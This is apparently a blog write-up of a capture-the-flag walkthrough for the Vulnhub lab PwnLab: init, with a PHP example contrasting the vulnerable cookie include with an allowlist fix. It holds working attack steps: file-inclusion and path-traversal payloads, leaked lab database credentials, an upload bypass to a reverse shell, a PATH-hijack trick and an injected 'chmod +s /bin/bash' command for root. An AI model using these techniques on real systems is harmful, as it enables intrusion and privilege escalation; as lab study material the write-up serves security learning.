Thursday, October 10, 2019

Vulnhub: PwnLab: init

source: https://www.vulnhub.com/entry/pwnlab-init,158/

192.168.1.95

nmap:
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
3306/tcp  open  mysql   MySQL 5.5.47-0+deb8u1
53409/tcp open  status  1 (RPC #100024)

debian 8 jessie

nikto:
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.

local file inclusion, config.php read through the ?page= parameter (php://filter/convert.base64-encode):

<?php
$server   = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>


mysql -h192.168.1.95 -uroot -pH4u%QJ_H99 -sN -e "select * from Users.users"
kent    Sld6WHVCSkpOeQ==    -> JWzXuBJJNy
mike    U0lmZHNURW42SQ==    -> SIfdsTEn6I
kane    aVN2NVltMkdSbw==    -> iSv5Ym2GRo

log in to login.php as kent with password JWzXuBJJNy

if (isset($_COOKIE['lang']))
{
        include("lang/".$_COOKIE['lang']);
}
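The cookie-driven include above, shown beside a hardened version, as an added example in PHP that is not part of the original writeup. The function names and the allowlist of translation files (en.php, fr.php) are assumptions.

```php
<?php
// Added example, not code from the original post or the PwnLab box.

// Vulnerable form: the raw cookie value is glued onto the path, so a value such as
// "../../../../etc/passwd" (or an uploaded .gif that contains PHP) gets included.
function load_lang_vulnerable(): void
{
    if (isset($_COOKIE['lang'])) {
        include("lang/" . $_COOKIE['lang']);
    }
}

// Hardened form: map the untrusted value onto a fixed allowlist of language files
// and never build a path from the raw cookie.
function resolve_lang_file(?string $lang): string
{
    // Assumed set of translation files shipped with the application.
    $allowed = [
        'en' => 'en.php',
        'fr' => 'fr.php',
    ];
    if ($lang === null || !isset($allowed[$lang])) {
        return 'lang/' . $allowed['en'];   // safe default on anything unexpected
    }
    return 'lang/' . $allowed[$lang];
}

function load_lang_hardened(): void
{
    $file = resolve_lang_file($_COOKIE['lang'] ?? null);
    // Defence in depth: the resolved file must still sit inside the lang directory.
    $base = realpath(__DIR__ . '/lang');
    $real = realpath(__DIR__ . '/' . $file);
    if ($base === false || $real === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        http_response_code(400);
        exit;
    }
    include $real;
}

// The resolver with the traversal and upload-style values used against the box
// (no include is performed here): every unexpected value falls back to the default.
assert(resolve_lang_file('../../../../etc/passwd') === 'lang/en.php');
assert(resolve_lang_file('../upload/xxx.gif') === 'lang/en.php');
assert(resolve_lang_file('fr') === 'lang/fr.php');
```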

local file inclusion via the lang cookie (lang ../../../../etc/passwd):
john:x:1000:1000:,,,:/home/john:/bin/bash
kent:x:1001:1001:,,,:/home/kent:/bin/bash
mike:x:1002:1002:,,,:/home/mike:/bin/bash
kane:x:1003:1003:,,,:/home/kane:/bin/bash


upload bypass:
read the upload script source: http://192.168.1.95/?page=php://filter/convert.base64-encode/resource=upload
in burp, change the extension php -> gif, set the MIME type to image/gif, and add the GIF89a header
get a reverse shell by including the upload through the cookie: lang ../upload/xxx.gif

Linux pwnlab 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt20-1+deb8u4 (2016-02-29) i686 GNU/Linux
PRETTY_NAME="Debian GNU/Linux 8 (jessie)"

privilege escalation: username kane, password iSv5Ym2GRo

strings ~/msgmike
export PATH="/home/kane:$PATH"
echo "/bin/bash -p" > ./cat
chmod +x cat
./msgmike

strings /home/mike/msg2root
/bin/echo %s >> /root/messages.txt
./msg2root
1; chmod +s /bin/bash
/bin/bash -p
Actually I need to create another reverse shell to cat the content of flag.txt.

